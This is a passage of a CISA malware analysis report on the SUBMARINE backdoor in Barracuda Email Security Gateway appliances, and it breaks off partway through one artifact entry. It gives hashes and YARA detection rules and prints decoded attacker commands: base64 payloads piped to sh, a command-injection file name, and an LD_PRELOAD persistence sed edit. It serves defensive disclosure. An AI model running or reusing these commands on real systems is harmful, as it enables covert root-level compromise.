

<!DOCTYPE html>
<html lang="en" dir="ltr" prefix="og: https://ogp.me/ns#" class="no-js">
  <head>
    <meta charset="utf-8" />
<link rel="canonical" href="https://www.cisa.gov/news-events/analysis-reports/ar23-209a" />
<meta property="og:site_name" content="Cybersecurity and Infrastructure Security Agency CISA" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://www.cisa.gov/news-events/analysis-reports/ar23-209a" />
<meta property="og:title" content="MAR-10454006-r1.v2 SUBMARINE Backdoor | CISA" />
<meta name="Generator" content="Drupal 9 (https://www.drupal.org)" />
<meta name="MobileOptimized" content="width" />
<meta name="HandheldFriendly" content="true" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="icon" href="/profiles/cisad8_gov/themes/custom/gesso/favicon.png" type="image/png" />

    <title>MAR-10454006-r1.v2 SUBMARINE Backdoor | CISA</title>
    <link rel="stylesheet" media="all" href="/core/modules/system/css/components/ajax-progress.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/align.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/autocomplete-loading.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/fieldgroup.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/container-inline.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/clearfix.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/details.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/hidden.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/item-list.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/js.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/nowrap.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/position-container.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/progress.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/reset-appearance.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/resize.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/sticky-header.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/system-status-counter.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/system-status-report-counters.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/system-status-report-general-info.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/tabledrag.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/tablesort.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/tree-child.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/views/css/views.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/modules/contrib/responsive_tables_filter/css/tablesaw-base.css?ryttwc" />
<link rel="stylesheet" media="screen" href="/modules/contrib/responsive_tables_filter/css/tablesaw-responsive.css?ryttwc" />
<link rel="stylesheet" media="all" href="/modules/contrib/responsive_tables_filter/css/tables.columntoggle.css?ryttwc" />
<link rel="stylesheet" media="all" href="/modules/contrib/responsive_tables_filter/css/customizations.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/filter/css/filter.caption.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/media/css/filter.caption.css?ryttwc" />
<link rel="stylesheet" media="all" href="/profiles/cisad8_gov/modules/custom/toolbar_tasks/css/toolbar.css?ryttwc" />
<link rel="stylesheet" media="all" href="/modules/contrib/extlink/extlink.css?ryttwc" />
<link rel="stylesheet" media="all" href="/modules/contrib/ckeditor_accordion/css/ckeditor-accordion.css?ryttwc" />
<link rel="stylesheet" media="all" href="/modules/contrib/better_social_sharing_buttons/css/better_social_sharing_buttons.css?ryttwc" />
<link rel="stylesheet" media="all" href="/modules/contrib/paragraphs/css/paragraphs.unpublished.css?ryttwc" />
<link rel="stylesheet" media="all" href="//fonts.googleapis.com/css2?family=Montserrat:wght@400;500;600;700&amp;family=Public+Sans:wght@400;500;600;700&amp;display=swap" />
<link rel="stylesheet" media="all" href="/profiles/cisad8_gov/themes/custom/gesso/dist/css/styles.css?ryttwc" />

    
  </head>
  <body  class="path-node not-front node-page node-page--node-type-advisory" id="top">
    
    
      <div class="dialog-off-canvas-main-canvas" data-off-canvas-main-canvas>
    

<div  class="l-site-container">
    
      

  
  



  
  

  
  

  <main id="main" class="c-main" role="main" tabindex="-1">
    
      
    


<div  class="l-content">
          







  
  
    

  
            





<div  role="article" class="is-promoted l-full">
    <div class="l-full__header">
        
<div  class="c-page-title">
  <div class="c-page-title__inner l-constrain">
    <div class="c-page-title__row">
      <div class="c-page-title__content">
                  <div class="c-page-title__meta">Analysis Report</div>
                <h1 class="c-page-title__title">
<span>MAR-10454006-r1.v2 SUBMARINE Backdoor</span>
</h1>
                                                          <div class="c-page-title__fields">  




<div  class="c-field c-field--name-field-release-date c-field--type-datetime c-field--label-above">
  <div  class="c-field__label">Release Date</div><div class="c-field__content"><time datetime="2023-07-28T12:00:00Z">July 28, 2023</time></div></div>

  




<div  class="c-field c-field--name-field-alert-code c-field--type-string c-field--label-above">
  <div  class="c-field__label">Alert Code</div><div class="c-field__content">AR23-209A</div></div>

</div>
                        
        
      </div>
          </div>
    <div class="c-page-title__decoration"></div>
  </div>
</div>
    </div>
    <div class="l-full__main">
                      

<div  class="l-page-section l-page-section--rich-text">
      <div class="l-constrain">
  
  
  <div class="l-page-section__content">
          <p>  </p>
<table id="cma-table"><tbody><tr><td>
<h3>Notification</h3>
<p>This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.</p>
<p>This document is marked TLP:CLEAR--Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see https://www.cisa.gov/tlp.</p>
<h3>Summary</h3>
<h5>Description</h5>
<p>CISA obtained seven malware samples related to a novel backdoor CISA has named SUBMARINE. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting Barracuda Email Security Gateway (ESG) appliance versions 5.1.3.001 through 9.2.0.006.</p>
<p>			SUBMARINE is a novel persistent backdoor that lives in a Structured Query Language (SQL) database on the ESG appliance. SUBMARINE comprises multiple artifacts that, in a multi-step process, enable execution with root privileges, persistence, command and control, and cleanup. In addition to SUBMARINE, CISA obtained associated Multipurpose Internet Mail Extensions (MIME) attachment files from the victim. These files contained the contents of the compromised SQL database, which included sensitive information.</p>
<p>			For information about related malware, specifically information on the initial exploit payload and other backdoors, see CISA Alert: <a href="/news-events/alerts/2023/07/28/cisa-releases-malware-analysis-reports-barracuda-backdoors">CISA Releases Malware Analysis Reports on Barracuda Backdoors</a>.</p>
<p>Download the PDF version of this report:</p>



<div class="align-center c-file">
    <div class="c-file__download">
    <a href="/sites/default/files/2023-07/MAR-10454006.r1.v2.CLEAR_.pdf" class="c-file__link" target="_blank">AR23-209A PDF</a>
    <span class="c-file__size">(PDF,       1.18 MB
  )</span>
  </div>
</div>
<p>For a downloadable copy of IOCs associated with this MAR in JSON format, see:</p>



<div class="align-center c-file">
    <div class="c-file__download">
    <a href="/sites/default/files/2023-07/MAR-10454006.r1.v2.CLEAR_stix2.json" class="c-file__link" target="_blank">AR23-209A JSON</a>
    <span class="c-file__size">(JSON,       48.51 KB
  )</span>
  </div>
</div>
<h5>Submitted Files (5)</h5>
<p>6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0 (r)</p>
<p>81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab (libutil.so)</p>
<p>8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239 (machineecho_-n_Y2htb2QgK3ggL3J...)</p>
<p>b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43 (sedO4CWZ9)</p>
<p>cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a (smtpctl)</p>
<h5>Additional Files (2)</h5>
<p>2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5 (config.TRG)</p>
<p>bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a (run.sh)</p>
<h3>Findings</h3>
<h4>2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5</h4>
<h5>Details</h5>
<p>			--&gt;</p>
<table><tbody><tr><th>Name</th>
<td>config.TRG</td>
</tr><tr><th>Size</th>
<td>5465 bytes</td>
</tr><tr><th>Type</th>
<td>ASCII text, with very long lines</td>
</tr><tr><th>MD5</th>
<td>d03e1f112f0c784a39003e0b3992ad80</td>
</tr><tr><th>SHA1</th>
<td>447369281ba26b7a6da4f659aa31026605aa3c6f</td>
</tr><tr><th>SHA256</th>
<td>2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5</td>
</tr><tr><th>SHA512</th>
<td>aead33a656f647d58da0a7f5240eb8cd7c0121c9ea33ae6504687b5faf21779e67b659a93987392033ea8ae2aae239e432444dcddad52f2a8665add7265902f6</td>
</tr><tr><th>ssdeep</th>
<td>96:CjXDCc0wSWbCZgFHwlJc8UpsmdpanoP5Mc8wWuMdHABIz2mN:CjXDN0wSWQp08UpsmFm4mhCm</td>
</tr><tr><th>Entropy</th>
<td>6.062477</td>
</tr><tr><th>Malware Result</th>
<td>unknown</td>
</tr></tbody></table><h5>Antivirus</h5>
<p>No matches found.</p>
<h5>YARA Rules</h5>
<ul><li>rule CISA_10454006_06 : SUBMARINE trojan backdoor cleans_traces_of_infection hides_artifacts installs_other_components<br />
				{<br />
				   meta:<br />
				       Author = "CISA Code &amp; Media Analysis"<br />
				       Incident = "10454006"<br />
				       Date = "2023-07-11"<br />
				       Last_Modified = "20230727_1200"<br />
				       Actor = "n/a"<br />
				       Family = "SUBMARINE"<br />
				       Capabilities = "cleans-traces-of-infection hides-artifacts installs-other-components"<br />
				       Malware_Type = "trojan backdoor"<br />
				       Tool_Type = "unknown"<br />
				       Description = "Detects SUBMARINE SQL trigger samples"<br />
				       SHA256_1 = "2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5"<br />
				   strings:<br />
				       $s1 = { 54 52 49 47 47 45 52 }<br />
				       $s2 = { 43 52 45 41 54 45 }<br />
				       $s3 = { 53 45 4c 45 43 54 20 22 65 63 68 6f 20 2d 6e }<br />
				       $s4 = { 62 61 73 65 36 34 20 2d 64 20 7c 20 73 68 }<br />
				       $s5 = { 72 6f 6f 74 }<br />
				       $s6 = { 53 45 54 }<br />
				       $s7 = { 45 4e 44 20 49 46 3b }<br />
				       $s8 = { 48 34 73 49 41 41 41 41 41 41 41 41 41 2b 30 61 43 33 42 55 }<br />
				       $s9 = { 2f 76 61 72 2f 74 6d 70 2f 72 }<br />
				       $s10 = { 2f 72 6f 6f 74 2f 6d 61 63 68 69 6e 65 }<br />
				   condition:<br />
				   filesize &lt; 250KB and all of them<br />
				}</li>
</ul><h5>ssdeep Matches</h5>
<p>No matches found.</p>
<h5>Description</h5>
<p>The file 'config.TRG' is a SUBMARINE artifact. The presence of a file named 'config.TRG' does not by itself indicate that the ESG is infected; it is the file's contents that determine whether the appliance is compromised. The contents of 'config.TRG' are contained within the SQL database file called 'config.snapshot' and within the MIME attachments. Presence of the contents of 'config.TRG' (the malicious trigger described below) within the SQL database is indicative of a SUBMARINE infection.</p>
<p>			The file contains a malicious SQL trigger called ‘cuda_trigger’ (Figure 1). The trigger is defined to execute as 'root' on the local host and fires before a row is deleted from the database table it is attached to; this is what gives SUBMARINE its persistence, since any later row deletion re-runs the payload. When the trigger's conditions are met, two actions occur. First, a compressed, base64-encoded blob containing two files is written to a file called ‘r’ in the ‘/var/tmp’ directory (Figure 2). Second, a base64-encoded command is decoded and executed (Figure 3).</p>
<p>			--Begin Base64 Decoded Command--<br />
			cat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp<br />
			nohup bash /var/tmp/run.sh &lt;BSMTP_ID&gt; &gt;/dev/null 2&gt;&amp;1 &amp;<br />
			rm -f /root/machine\`*<br />
			chmod +x /root/mac*<br />
			sh /root/mach*\`*<br />
			--End Base64 Decoded Command--</p>
<p>			The decoded commands pass the contents of the file 'r' through 'base64 -d' and then to 'tar', which decompresses and extracts it into '/var/tmp'. Next, 'run.sh' is launched under the 'nohup' command, which lets the process keep running after the invoking shell exits; the appliance's 'BSMTP_ID' is passed as its argument, and both standard output and standard error are redirected to '/dev/null' (a device file, not a directory) and discarded. Lastly, any files in '/root' whose names begin with 'machine`' are deleted, all files matching the glob '/root/mac*' are marked executable, and any file matching '/root/mach*`*' is executed with 'sh'.</p>
<h5>Screenshots</h5>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%201.jpg?itok=Ixr7Sia5" width="600" height="78" alt="Figure 1" /></div>
  </figure><p><strong>Figure 1. - </strong>The malicious SQL trigger called 'cuda_trigger'.</p>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%202.jpg?itok=qX9Lz0qY" width="600" height="53" alt="Figure 2" /></div>
  </figure><p><strong>Figure 2. - </strong>A small snippet of the base64 blob being written into the file 'r'.</p>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%203.jpg?itok=b8xbUr9d" width="596" height="92" alt="Figure 3" /></div>
  </figure><p><strong>Figure 3. - </strong>A small snippet of the base64 encoded command found after 'r' is written.</p>
<h4>8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239</h4>
<h5>Details</h5>
<p>			--&gt;</p>
<table><tbody><tr><th>Name</th>
<td>machineecho_-n_Y2htb2QgK3ggL3Jvb3QvbWFjKgpzaCAvcm9vdC9tYWNoKlxgKgoK___base64_-d__sh</td>
</tr><tr><th>Size</th>
<td>202 bytes</td>
</tr><tr><th>Type</th>
<td>ASCII text</td>
</tr><tr><th>MD5</th>
<td>c5c93ba36e079892c1123fe9dffd660f</td>
</tr><tr><th>SHA1</th>
<td>e1df0da64a895ff00fc27a41898aa221b5b7d926</td>
</tr><tr><th>SHA256</th>
<td>8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239</td>
</tr><tr><th>SHA512</th>
<td>a07e79b99e02fa52ab5ab75fc2d989d35d4b360a57fdf0ec5569f445fe1820d26915adbd4f30e3a9126e5cabcde9ca840779039393c39e5838618f06db47a4cc</td>
</tr><tr><th>ssdeep</th>
<td>3:jT81L9RUjD+rlczyX837QTa0NDO9Z8giofQHcQMHL6wF8ufIhW0TaT7ZsNvn:c1JRID+pc2XS7Ga0yYgC3GLX8Q0TaRsv</td>
</tr><tr><th>Entropy</th>
<td>5.481015</td>
</tr><tr><th>Malware Result</th>
<td>unknown</td>
</tr></tbody></table><h5>Antivirus</h5>
<p>No matches found.</p>
<h5>YARA Rules</h5>
<ul><li>rule CISA_10454006_07 : SUBMARINE trojan dropper exploit_kit evades_av hides_executing_code hides_artifacts exploitation<br />
				{<br />
				   meta:<br />
				       Author = "CISA Code &amp; Media Analysis"<br />
				       Incident = "10454006"<br />
				       Date = "2023-07-11"<br />
				       Last_Modified = "20230711_1830"<br />
				       Actor = "n/a"<br />
				       Family = "SUBMARINE"<br />
				       Capabilities = "evades-av hides-executing-code hides-artifacts"<br />
				       Malware_Type = "trojan dropper exploit-kit"<br />
				       Tool_Type = "exploitation"<br />
				       Description = "Detects ESG FileName exploit samples"<br />
				       SHA256 = "8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239"<br />
				   strings:<br />
				       $s1 = { 7c 20 62 61 73 65 36 34 20 2d 64 20 7c 20 73 68 }<br />
				       $s2 = { 65 63 68 6f 20 2d 6e }<br />
				       $s3 = { 59 32 46 30 49 43 39 32 59 58 49 76 64 47 31 77 4c 33 49 67 66 43 42 69 59 58 4e 6c 4e 6a 51 67 4c 57 51 67 4c 57 6b 67 66 43 42 30 59 58 49 67 }<br />
				   condition:<br />
				       filesize &lt; 1KB and all of them<br />
				}</li>
</ul><h5>ssdeep Matches</h5>
<p>No matches found.</p>
<h5>Description</h5>
<p>The file 'machineecho -n Y2htb2QgK3ggL3Jvb3QvbWFjKgpzaCAvcm9vdC9tYWNoKlxgKgoK _ base64 -d _sh`_' is a SUBMARINE artifact. The file is a shell script identified in the '/root' directory and contains base64 encoded commands. The file name itself is the exploit payload: it is crafted so that, when the vulnerable ESG passes the file name to a Linux shell without sanitization (the CVE-2023-2868 command injection referenced above), the base64 string embedded in the name is decoded and executed.</p>
<p>			--Begin Base64 Decoded Name/Command--<br />
			chmod +x /root/mac*<br />
			sh /root/mach*\`*<br />
			--End Base64 Decoded Name/Command--</p>
<p>			The first command marks every file matching the glob '/root/mac*' as executable (the target is a set of files, not a directory); the second then runs any file matching '/root/mach*`*' with 'sh'.</p>
<p>			The file contains a series of operations, such as decoding a base64 encoded string and executing the decoded result as a shell command. The decoded base64 string represents a series of commands that will be executed by the shell.</p>
<p>			~Begin Base64 Decoded Command~</p>
<p>			cat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp<br />
			nohup bash /var/tmp/run.sh &lt;REDACTED BSMTP_ID&gt;    &gt;/dev/null 2&gt;&amp;1 &amp;<br />
			rm -f /root/machine\`*</p>
<p>			~End Base64 Decoded Command~</p>
<p>			This command is identical to the decoded base64 commands found in the SQL trigger identified in the file 'config.snapshot'.</p>
<h4>6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0</h4>
<h5>Details</h5>
<p>			--&gt;</p>
<table><tbody><tr><th>Name</th>
<td>r</td>
</tr><tr><th>Size</th>
<td>4857 bytes</td>
</tr><tr><th>Type</th>
<td>ASCII text, with very long lines</td>
</tr><tr><th>MD5</th>
<td>03e07c538a5e0e7906af803a83c97a1e</td>
</tr><tr><th>SHA1</th>
<td>600452b1cff8d99e41093be8b68f62e7c85f23d7</td>
</tr><tr><th>SHA256</th>
<td>6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0</td>
</tr><tr><th>SHA512</th>
<td>a4a6257dd6f859ae58de3b46879926ce99e3e3edb16db37dc80da4975f5a2866f4cd722233b98c9553e319e61661cae98d535ccb26d8c9709cf6f2efa56b9b3f</td>
</tr><tr><th>ssdeep</th>
<td>96:pjXDCc0wSWbCZgFHwlJc8UpsmdpanoP5Mc8wWuMdHABIZ:pjXDN0wSWQp08UpsmFm4mhCC</td>
</tr><tr><th>Entropy</th>
<td>5.988140</td>
</tr><tr><th>Malware Result</th>
<td>unknown</td>
</tr></tbody></table><h5>Antivirus</h5>
<p>No matches found.</p>
<h5>YARA Rules</h5>
<p>Note: the rule below calls <code>math.entropy</code>, so the YARA <code>math</code> module must be imported (<code>import "math"</code> at the top of the rule file) or the rule will fail to compile.</p>
<ul><li>rule CISA_10454006_02 : SUBMARINE trojan backdoor exploitation hides_artifacts prevents_artifact_access<br />
				{<br />
				   meta:<br />
				       Author = "CISA Code &amp; Media Analysis"<br />
				       Incident = "10454006"<br />
				       Date = "2023-06-29"<br />
				       Last_Modified = "20230711_1500"<br />
				       Actor = "n/a"<br />
				       Family = "SUBMARINE"<br />
				       Capabilities = "hides-artifacts prevents-artifact-access"<br />
				       Malware_Type = "trojan backdoor"<br />
				       Tool_Type = "exploitation"<br />
				       Description = "Detects encoded GZIP archive samples"<br />
				       SHA256_1 = "6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0"<br />
				   strings:<br />
				       $s1 = { 48 34 73 49 41 41 41 41 41 41 41 41 41 2b 30 61 }<br />
				       $s2 = { 44 44 44 41 67 50 39 2f 2b 43 38 47 70 2f 36 63 41 46 41 41 41 41 3d 3d 0a}<br />
				       $s3 = { 37 56 4d 70 56 58 4f 37 2b 6d 4c 39 78 2b 50 59 }<br />
				   condition:<br />
				       filesize &lt; 6KB and 3 of them and (math.entropy(0,filesize) &gt; 5.8)<br />
				}</li>
</ul><h5>ssdeep Matches</h5>
<p>No matches found.</p>
<h5>Relationships</h5>
<table><tbody><tr><td>6dd8de093e...</td>
<td>Contains</td>
<td>81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab</td>
</tr><tr><td>6dd8de093e...</td>
<td>Contains</td>
<td>bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a</td>
</tr></tbody></table><h5>Description</h5>
<p>The file 'r' is a SUBMARINE artifact. The file is a Base64 encoded GNU Zip (GZIP) archive. When the 'cat /*/*/r | base64 -d -i | tar -zx -C /*/*' Linux Shell command is applied to 'r', it decompresses two files. The aforementioned Linux Shell command is contained in 'config.snapshot' as a Base64 encoded SQL trigger.</p>
<p>			--Begin Decompressed Files--<br />
			1. run.sh (bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a)<br />
			2. libutil.so (81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab)<br />
			--End Decompressed Files--</p>
<h4>bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a</h4>
<h5>Details</h5>
<p>			--&gt;</p>
<table><tbody><tr><th>Name</th>
<td>run.sh</td>
</tr><tr><th>Size</th>
<td>473 bytes</td>
</tr><tr><th>Type</th>
<td>POSIX shell script, ASCII text executable</td>
</tr><tr><th>MD5</th>
<td>c2e577c71d591999ad5c581e49343093</td>
</tr><tr><th>SHA1</th>
<td>d446e06e40053214788aa1bad17b6d3587a2a370</td>
</tr><tr><th>SHA256</th>
<td>bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a</td>
</tr><tr><th>SHA512</th>
<td>ffe528fcb448424b1f811a4b9068402971bf2705ad64e556071a062cd89d74d371d3ef41afca38450b7d8457611246a6ba35478dfc83e997950d2f85c8dac80f</td>
</tr><tr><th>ssdeep</th>
<td>12:avOAsp2yBXGTVjnJAIFw/J7G80ZWkbUErPzg:azsphBXSFZFwgLWkXg</td>
</tr><tr><th>Entropy</th>
<td>5.323635</td>
</tr><tr><th>Malware Result</th>
<td>unknown</td>
</tr></tbody></table><h5>Antivirus</h5>
<p>No matches found.</p>
<h5>YARA Rules</h5>
<ul><li>rule CISA_10454006_03 : SUBMARINE trojan backdoor loader rootkit virus controls_local_machine hides_artifacts infects_files installs_other_components remote_access exploitation information_gathering<br />
				{<br />
				   meta:<br />
				       Author = "CISA Code &amp; Media Analysis"<br />
				       Incident = "10454006"<br />
				       Date = "2023-07-03"<br />
				       Last_Modified = "20230711_1500"<br />
				       Actor = "n/a"<br />
				       Family = "SUBMARINE"<br />
				       Capabilities = "controls-local-machine hides-artifacts infects-files installs-other-components"<br />
				       Malware_Type = "trojan backdoor loader rootkit virus"<br />
				       Tool_Type = "remote-access exploitation information-gathering"<br />
				       Description = "Detects SUBMARINE launcher script samples"<br />
				       SHA256_1 = "bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a"<br />
				   strings:<br />
				       $s1 = { 73 65 64 20 2d 69 }<br />
				       $s2 = { 4c 44 5f 50 52 45 4c 4f 41 44 3d }<br />
				       $s3 = { 6c 69 62 75 74 69 6c 2e 73 6f }<br />
				       $s4 = { 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c }<br />
				       $s5 = { 2f 62 6f 6f 74 2f 6f 73 5f 74 6f 6f 6c 73 }<br />
				       $s6 = { 72 6d 20 2d 72 66 }<br />
				       $s7 = { 62 61 73 65 36 34 20 2d 64 }<br />
				       $s8 = { 7c 73 68 }<br />
				       $s9 = { 72 65 73 74 61 72 74 }<br />
				       $s10 = { 2f 64 65 76 2f 6e 75 6c 6c }<br />
				       $s11 = { 23 21 20 2f 62 69 6e 2f 73 68 }<br />
				       $s12 = { 62 61 73 65 36 34 }<br />
				   condition:<br />
				       filesize &lt; 2KB and all of them<br />
				}</li>
<li>rule CISA_10454006_04 : SUBMARINE trojan backdoor hides_artifacts hides_executing_code infects_files installs_other_components remote_access exploitation<br />
				{<br />
				   meta:<br />
				       Author = "CISA Code &amp; Media Analysis"<br />
				       Incident = "10454006"<br />
				       Date = "2023-07-05"<br />
				       Last_Modified = "20230711_1500"<br />
				       Actor = "n/a"<br />
				       Family = "SUBMARINE"<br />
				       Capabilities = "hides-artifacts hides-executing-code infects-files installs-other-components"<br />
				       Malware_Type = "trojan backdoor"<br />
				       Tool_Type = "remote-access exploitation"<br />
				       Description = "Detects SUBMARINE launcher script samples"<br />
				       SHA256_1 = "b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43"<br />
				   strings:<br />
				       $s1 = { 73 6c 65 65 70 }<br />
				       $s2 = { 7c 62 61 73 65 36 34 20 2d 64 }<br />
				       $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 }<br />
				       $s4 = { 2f 68 6f 6d 65 2f 70 72 6f 64 75 63 74 2f 63 6f 64 65 2f 66 69 72 6d 77 61 72 65 2f 63 75 72 72 65 6e 74 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c 20 72 65 73 74 61 72 74 }<br />
				       $s5 = { 65 63 68 6f 20 2d 6e 20 27 }<br />
				       $s6 = { 73 68 }<br />
				       $s7 = { 23 21 20 2f 62 69 6e 2f 73 68 }<br />
				   condition:<br />
				       filesize &lt; 2KB and 6 of them<br />
				}</li>
</ul><h5>ssdeep Matches</h5>
<p>No matches found.</p>
<h5>Relationships</h5>
<table><tbody><tr><td>bbbae0455f...</td>
<td>Contained_Within</td>
<td>6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0</td>
</tr></tbody></table><h5>Description</h5>
<p>The file 'run.sh' is a SUBMARINE loader. The file is a shell script contained within the archive 'r' and extracted into the '/var/tmp' directory. The purpose of 'run.sh' is to perform a combination of file manipulation, script generation and execution (Figure 4). There are five variables within 'run.sh':</p>
<p>			--Begin Variable List--</p>
<p>			B1=$1<br />
			F="/boot/os_tools/hw-set"<br />
			S="/home/product/code/firmware/current/sbin/smtpctl"<br />
			A="/boot/os_tools/libutil.so"<br />
			B=`echo -n "sed -i \"s|exec|BSMTP_ID=$B1 LD_PRELOAD=$A exec|g\" $S"|base64 -w0`</p>
<p>			--End Variable List--</p>
<p>			The script begins by moving SUBMARINE from the '/var/tmp/' directory to the '/boot/os_tools/' directory for persistence.</p>
<p>			The variable "B" holds a 'sed' command, applied to the file named in "S" ('/home/product/code/firmware/current/sbin/smtpctl'), that replaces every occurrence of the string 'exec' with 'BSMTP_ID=$1 LD_PRELOAD=/boot/os_tools/libutil.so exec'. The 'sed' command is stored base64 encoded, presumably so that the 'LD_PRELOAD' string does not appear in clear text in the loader.</p>
<p>			A new file called 'hw-set' is created in the '/boot/os_tools/' directory. The script written into it checks the 'smtpctl' file for the string 'LD_PRELOAD'. If the string is not found, the base64 encoded string stored in variable "B" is decoded and executed as a shell command, inserting the 'LD_PRELOAD' directive into 'smtpctl', and 'smtpctl' is restarted so that the daemon loads the backdoor.</p>
<p>			The 'chmod' command is used to set executable permissions for 'hw-set'.</p>
<p>			The 'sed' command is used with the '-i' flag to insert a string at line 44 of the file 'update_version' within the '/boot/os_tools/' directory. The inserted string, "system('/boot/os_tools/hw-set 2&gt;&amp;1 &gt;/dev/null &amp;');", runs 'hw-set' in the background whenever 'update_version' is executed, giving the malware a second persistence hook. Note that with this redirection order ('2&gt;&amp;1' before '&gt;/dev/null') standard output goes to '/dev/null' but standard error remains attached to the caller's original standard output.</p>
<p>			The file 'hw-set' is executed and the 'sed' command with the '-i' flag is used to insert the string 'sleep 2m' on line 1 to set a sleep duration of 2 minutes.</p>
<p>			Finally, all files and directories within '/var/tmp/' directory are removed.</p>
<h5>Screenshots</h5>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%204.jpg?itok=Zq0MpiQA" width="600" height="329" alt="Figure 4" /></div>
  </figure><p><strong>Figure 4. - </strong>The contents of the file, 'run.sh.'</p>
<h4>b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43</h4>
<h5>Details</h5>
<p>			--&gt;</p>
<table><tbody><tr><th>Name</th>
<td>hw-set</td>
</tr><tr><th>Name</th>
<td>sedO4CWZ9</td>
</tr><tr><th>Size</th>
<td>341 bytes</td>
</tr><tr><th>Type</th>
<td>POSIX shell script, ASCII text executable, with very long lines</td>
</tr><tr><th>MD5</th>
<td>b860198feca7398bc79a8ec69afc65ed</td>
</tr><tr><th>SHA1</th>
<td>c4c64da81995044ea3447b8ffd07689382b7487b</td>
</tr><tr><th>SHA256</th>
<td>b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43</td>
</tr><tr><th>SHA512</th>
<td>0d4b66dbeb88e8c9fb970572c033ab84b8273734277edb139cdc04560a0547d192a6762fc8ed8138eb43f7d05df6c36aa6bc1987eda4a4b6075e9059e71ef358</td>
</tr><tr><th>ssdeep</th>
